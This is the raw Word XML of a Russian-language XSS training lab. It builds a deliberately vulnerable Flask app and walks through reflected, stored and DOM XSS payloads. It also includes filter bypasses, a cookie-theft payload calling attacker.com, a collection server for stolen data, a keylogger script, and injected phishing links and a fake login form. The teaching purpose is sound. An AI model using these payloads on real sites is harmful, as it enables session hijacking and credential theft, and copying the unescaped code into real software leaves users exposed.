          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> plain text:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'admin': 'password123'. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Исправление: хранить только криптографические хэши (bcrypt, scrypt, Argon2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164B643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Запуск с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>debug=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> в production:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Раскрывает трассировки стека и внутреннюю информацию. Исправление: использовать переменные окружения для конфигурации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB118A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Вывод:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Ручной анализ кода позволяет находить логические уязвимости, которые часто упускают автоматические сканеры. Ключевые навыки — умение отслеживать поток </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ненадёжных пользовательских данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> (inputs) через приложение к критическим операциям (execution points, вывод на страницу, запросы к БД) и понимание контекста использования опасных функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F653045">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245633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ПРАКТИЧЕСКАЯ РАБОТА №3: ИССЛЕДОВАНИЕ И ЭКСПЛУАТАЦИЯ МЕЖСАЙТОВОГО СКРИПТИНГА (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ACA6E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0AFC4AF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 работы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD5981E">
      <w:pPr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Понимать механизмы возникновения XSS-уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C395FF6">
      <w:pPr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Научиться выявлять XSS в веб-приложениях</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60232886">
      <w:pPr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Освоить базовые техники эксплуатации XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD67372">
      <w:pPr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Понимать последствия и методы защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117C34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Классификация XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ABD6C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Reflected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- отражённая (непостоянная)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B9BE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Stored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- сохранённая (постоянная)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0378162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DOM-based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- на стороне DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6A2F9">
      <w:pPr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 xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6E4E8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-567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1: Лабораторная среда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F183F78">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-567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1.1 Уязвимое приложение (для тестирования)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047B85B">
      <w:pPr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Создадим простое уязвимое Flask-приложение:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78779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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90B18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vulnerable_app.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6469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from flask import Flask, request, render_template_string, make_response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE75C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import html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F84CB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05A4265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app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0560400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8855DF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База данных "в памяти" для хранения сообщений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F732F5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messages = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EAF4B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60BA01F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@app.route('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA4E8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def index():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2624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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47125A6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&lt;h1&gt;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Уязвимый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форум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BookHub&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623C66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href="/reflected"&gt;Reflected XSS&lt;/a&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457EA60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href="/stored"&gt;Stored XSS&lt;/a&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4EB4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href="/dom"&gt;DOM-based XSS&lt;/a&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B30998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&lt;a href="/safe"&gt;Безопасная версия&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4083B6E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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D907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B6C146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========== REFLECTED XSS ==========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58625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@app.route('/reflected')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1FED8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def reflected_xss():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A90BE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УЯЗВИМЫЙ КОД: пользовательский ввод без экранирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F8E8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name = request.args.get('name', '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Гость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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCCD0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template = f'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B117D0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&lt;h2&gt;Reflected XSS&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F62AF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&lt;form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB332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Введите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имя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: &lt;input name="name" value="{name}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224533F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&lt;button&gt;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Приветствовать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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E715F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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6342AE5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&lt;p&gt;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Привет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, {name}!&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028663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Назад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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E59DB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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE1A5D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render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA31F7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1EFAD83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========== STORED XSS ==========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1845BAD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@app.route('/stored', methods=['GET', 'POST'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D32B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def stored_xss():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FEFF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global messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F16EF1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5DDF1CF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if request.method == 'POST':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536656C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УЯЗВИМЫЙ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КОД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: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сохранение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без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санитизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C6C4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message = request.form.get('message', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1572EB6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messages.append(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCF7A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10758E7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УЯЗВИМЫЙ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КОД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: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вывод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без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экранирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7727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messages_html = ''.join([f'&lt;li&gt;{msg}&lt;/li&gt;' for msg in messages])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321F86D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7E84BBB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template = f'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45237FD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&lt;h2&gt;Stored XSS (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Гостевая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книга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)&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEBC22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&lt;form method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58843FB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Сообщение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: &lt;textarea name="message"&gt;&lt;/textarea&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648D188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&lt;button&gt;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Отправить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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31D6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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCE0B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&lt;hr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906ECC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&lt;h3&gt;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Сообщения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:&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B695F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&lt;ul&gt;{messages_html}&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4E2E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Назад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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA08EA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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D905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render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7DE4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D47473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========== DOM-based XSS ==========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284321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@app.route('/dom')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54829B2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def dom_xss():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31864E1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template = '''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E303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&lt;h2&gt;DOM-based XSS&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D0E8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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63AC6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function greetUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAF22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//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УЯЗВИМЫЙ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КОД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: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использование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innerHTML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без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санитизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33893F5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const name = document.getElementById('name').value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350307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document.getElementById('greeting').innerHTML = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26603E1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    "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Привет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, " + name + "!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553AD1A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8A7AB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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77939AE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&lt;input id="name" placeholder="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Введите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имя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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA352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&lt;button onclick="greetUser()"&gt;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Поприветствовать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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6240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&lt;div id="greeting"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6050E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Назад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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C37C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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5D92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render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2804D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C4F2A3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========== SAFE VERSION ==========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64124B1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@app.route('/safe')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD81237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def safe_version():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783FA5C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БЕЗОПАСНЫЙ КОД: экранирование вывода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8201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name = request.args.get('name', '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Гость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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484910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escaped_name = html.escape(name)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Экранирование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HTML-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сущностей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCEF5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0735E998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template = f'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F26A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&lt;h2&gt;Безопасная версия&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B155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&lt;form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD517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Введите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имя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: &lt;input name="name" value="{escaped_name}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB0CE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&lt;button&gt;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Приветствовать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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C0A5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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05531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&lt;p&gt;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Привет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, {escaped_name}!&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D518F1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&lt;a href="/"&gt;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Назад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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA66C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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776A85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render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2480E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971BDF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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9262D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app.run(debug=True, port=5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7647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Запустите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приложение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: python vulnerable_app.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07160E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73E60095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2: Обнаружение и эксплуатация XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B14ABD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2.1 Тестирование Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D232F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1: Базовое тестирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B727B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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B39932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http://localhost:5000/reflected?name=test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24332BB9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13090791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2: Проверка на уязвимость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Попробуйте простой payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C741326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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F91F6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http://localhost:5000/reflected?name=&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E10E56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2C5F7F8E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3: Обход базовых фильтров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Часто встречаются попытки фильтрации:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070A1AA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66AD47B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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A5559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Варианты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обхода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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D0F2A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&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F982A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&lt;svg onload=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A160AE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&lt;body onload=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AADF0C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&lt;a href="javascript:alert(1)"&gt;click&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AC698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0DFBC5FD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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>Усовершенствованный</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3EBEF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0EE7226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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F7254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http://localhost:5000/reflected?name=&lt;img src="x" onerror="alert(document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2E14D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5571E119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2.2 Тестирование Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD55B18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1: Отправка вредоносного сообщения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В форме /stored введите:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09B3AB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7014677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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2C9A0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&lt;script&gt;alert('Stored XSS!')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DB310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068DE75B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2: Проверка сохранения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Обновите страницу - алерт должен сработать автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB413A3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</w:p>
    <w:p w14:paraId="0CF13493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3: Создание более опасного payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27544EDB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1C7AACD1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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944975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&lt;img src="x" onerror="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F583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var img = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159763B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img.src = 'http://attacker.com/steal?cookie=' + document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD90605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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E68AB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7FC8E3E6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2.3 Тестирование DOM-based XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DBF8F2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1: Анализ JavaScript кода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Изучите функцию greetUser() в исходном коде страницы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA48A3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2: Ввод payload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В поле ввода на странице /dom введите:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A1E86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7BF15E3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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B77AD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&lt;img src=x onerror=alert('DOM XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BCB92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1AF1038B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 3: Проверка результата</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>Нажмите кнопку "Поприветствовать" - payload выполнится.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B21B933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47CA9ADD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3: Практическая эксплуатация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3F91C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3.1 Кража cookies сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798856F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Создадим простой сервер для перехвата данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A8FDC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2143BA2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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4876C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attacker_server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01949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from flask import Flask, request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AF79E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import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5046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AE71A6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app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC5DE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CDB05C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stolen_data = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979E9E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510173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@app.route('/steal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45587FD0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def steal():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C23AE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Логируем все перехваченные данные</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61B13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cookie = request.args.get('cookie', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD941B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ip = request.remote_addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BAA0B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user_agent = request.headers.get('User-Agent', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4256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timestamp = datetime.datetime.now().isoformat()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CD97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35FF37F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entry = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11FB9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'timestamp': timestamp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE481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'ip': ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5091F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'user_agent': user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FBA07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'cookie': cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048E8B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814F13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267706C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stolen_data.append(entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AE34F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print(f"[!]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Украдены данные: {entry}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF2A0D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</w:p>
    <w:p w14:paraId="75FCF682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return "OK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489C580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</w:p>
    <w:p w14:paraId="346A851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@app.route('/logs')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7581533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def logs():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D617EB3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Просмотр украденных данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20469BA1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html = "&lt;h1&gt;Украденные данные&lt;/h1&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCD3A0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for entry in stolen_data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38879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html += f"&lt;p&gt;{entry}&lt;/p&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5C22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return html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E560E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4BC2590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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD36D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app.run(port=9999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD01EE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368E51F1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en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>кражи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D3DF2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0CEA511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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1434835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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA07B9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img = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B27D3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img.src = 'http://localhost:9999/steal?cookie=' + encodeURIComponent(document.cookie);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B7323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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E6729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1CFCE7B9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3.2 Кейлоггинг (перехват нажатий клавиш)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9F68E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2D526E2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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58FF73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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474CAF7A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// Перехват всех нажатий клавиш</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4A6D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stolen = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB1B04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document.onkeypress = function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC40DF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stolen += String.fromCharCode(e.which);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57F6A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4F9F04B1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// Отправка каждые 10 символов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283DCD5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if(stolen.length &gt;= 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BBABC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img = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B8AC7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img.src = 'http://localhost:9999/log?data=' + encodeURIComponent(stolen);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BCD7D4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stolen = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB092E4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44001B7B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B11AD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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F885BEB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36520B71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3.3 Изменение содержимого страницы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F056716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048DAF9E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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A96F167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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7CE51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// Замена всех ссылок на фишинговые</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572C15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links = document.getElementsByTagName('a');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E70A849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for(var i = 0; i &lt; links.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4C57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links[i].href = "http://evil.com/phishing";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13487B5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB07DE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3DB548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Добавление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фейковой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формы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входа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00465C5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fakeForm = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26515045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fakeForm.innerHTML = '&lt;h3&gt;Введите учетные данные:&lt;/h3&gt;' +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188138A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                     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'&lt;input id="username" placeholder="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Логин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"&gt;' +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3067B29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         '&lt;input id="password" type="password" placeholder="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Пароль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"&gt;' +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A323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         '&lt;button onclick="stealCredentials()"&gt;</w:t>
      </w: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Войти</w:t>
      </w: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&lt;/button&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A5B4D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document.body.prepend(fakeForm);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417407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B10330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function stealCredentials() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17815BD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var data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC527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user: document.getElementById('username').value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E39A0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pass: document.getElementById('password').value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67981A3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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132818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new Image().src = 'http://localhost:9999/creds?' + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EFD5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                  encodeURIComponent(JSON.stringify(data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368E2E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5363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&lt;/script&gt;</w:t>
